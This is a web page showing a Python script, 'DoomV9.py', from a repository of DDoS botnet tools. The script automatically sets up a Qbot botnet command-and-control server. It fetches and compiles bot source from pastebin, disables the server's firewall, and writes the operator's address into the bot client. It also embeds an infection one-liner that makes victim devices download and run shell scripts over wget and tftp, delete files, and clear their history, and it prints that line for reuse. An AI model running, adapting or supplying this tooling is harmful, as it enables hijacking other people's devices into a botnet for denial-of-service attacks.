Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Auto Setup Qbot/DoomV9.py
5038 views
1
import subprocess
2
3
def cri(cmd):
4
subprocess.call(cmd, shell=True)
5
def replace_line(file_name, line_num, text):
6
lines = open(file_name, 'r').readlines()
7
lines[line_num] = text
8
out = open(file_name, 'w')
9
out.writelines(lines)
10
out.close()
11
12
print'\x1b[0;31m d8888b. .d88b. .d88b. .88b d88.'
13
print'\x1b[0;31m 88 `8D .8P Y8. .8P Y8. 88 YbdP`88 '
14
print'\x1b[0;31m 88 88 88 88 88 88 88 88 88 '
15
print'\x1b[0;31m 88 88 88 88 88 88 88 88 88 '
16
print'\x1b[0;31m 88 .8D `8b d8 `8b d8 88 88 88 '
17
print'\x1b[0;31m Y8888D `Y88P `Y88P YP YP YP BUILD ~ 9'
18
print'\x1b[1;37m[\x1b[0;31mDoom\x1b[1;37m] \x1b[1;37mCnC AutoSetup \nDeveloped By \x1b[0;31mFlexingOnLamers\x1b[1;37m/\x1b[0;31mCri '
19
20
ip = raw_input("\x1b[1;37mEnter Your Server IP:\x1b[1;35m")
21
user = raw_input("\x1b[1;37mEnter Desired Username:\x1b[1;35m")
22
passw = raw_input("\x1b[1;37mEnter Desired Password:\x1b[1;35m")
23
bport = raw_input("\x1b[1;37mEnter Desired BotPort:\x1b[0;31m")
24
port = raw_input("\x1b[1;37mEnter The Port You Want to screen on:\x1b[1;35m")
25
26
print '\x1b[1;35mInstalling Needed Dependencies..\x1b[1;37m'
27
cri('yum update -y')
28
cri('yum install python-paramiko gcc screen nano wget httpd iptables perl -y;')
29
cri('yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y')
30
cri('yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y')
31
cri('yum install epel-release -y')
32
cri('yum install gengetopt -y')
33
cri('wget -q https://pastebin.com/raw/iebkKPPW -O doom.c')
34
cri('gcc -o doom doom.c -pthread')
35
cri('rm -rf doom.c')
36
cri('wget -q https://pastebin.com/raw/idY5wpEu -O client.c')
37
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
38
cri('service iptabes stop')
39
cri('service httpd restart')
40
cri('systemctl stop firewalld')
41
cri('httpd -k restart')
42
cri('httpd -krestart')
43
cri('pkill screen')
44
45
replace_line('client.c', 859, 'unsigned char *AllDemDupes[] = { "'+ ip +':'+ bport +'" };\n')
46
replace_line('client.c', 861, 'char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";\n')
47
cri("echo "+ user +" "+ passw +" >> doom.txt")
48
cri("python cc7.py client.c "+ ip + "")
49
cri("screen ./doom "+ bport +" 1 "+ port +"")
50
print '\x1b[1;37mWget/CHARLINE Below!'
51
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
52
print '\x1b[1;37mThank you [\x1b[0;31m'+ user +'\x1b[1;37m] for using the \x1b[1;37m[\x1b[0;31mDoom\x1b[1;37m] \x1b[1;37mCnC AutoSetup \n\x1b[0;31mPastebin\x1b[1;37m:\x1b[1;36mhttps://pastebin.com/u/flexingonlamers \n\x1b[0;31mGithub\x1b[1;37m:\x1b[1;36mhttps://github.com/AgentCri/ \n\x1b[0;31mEmail\x1b[1;37m:\x1b[1;[email protected] \n\x1b[0;31mDiscord\x1b[1;37m:\x1b[1;36mCri#4614'
53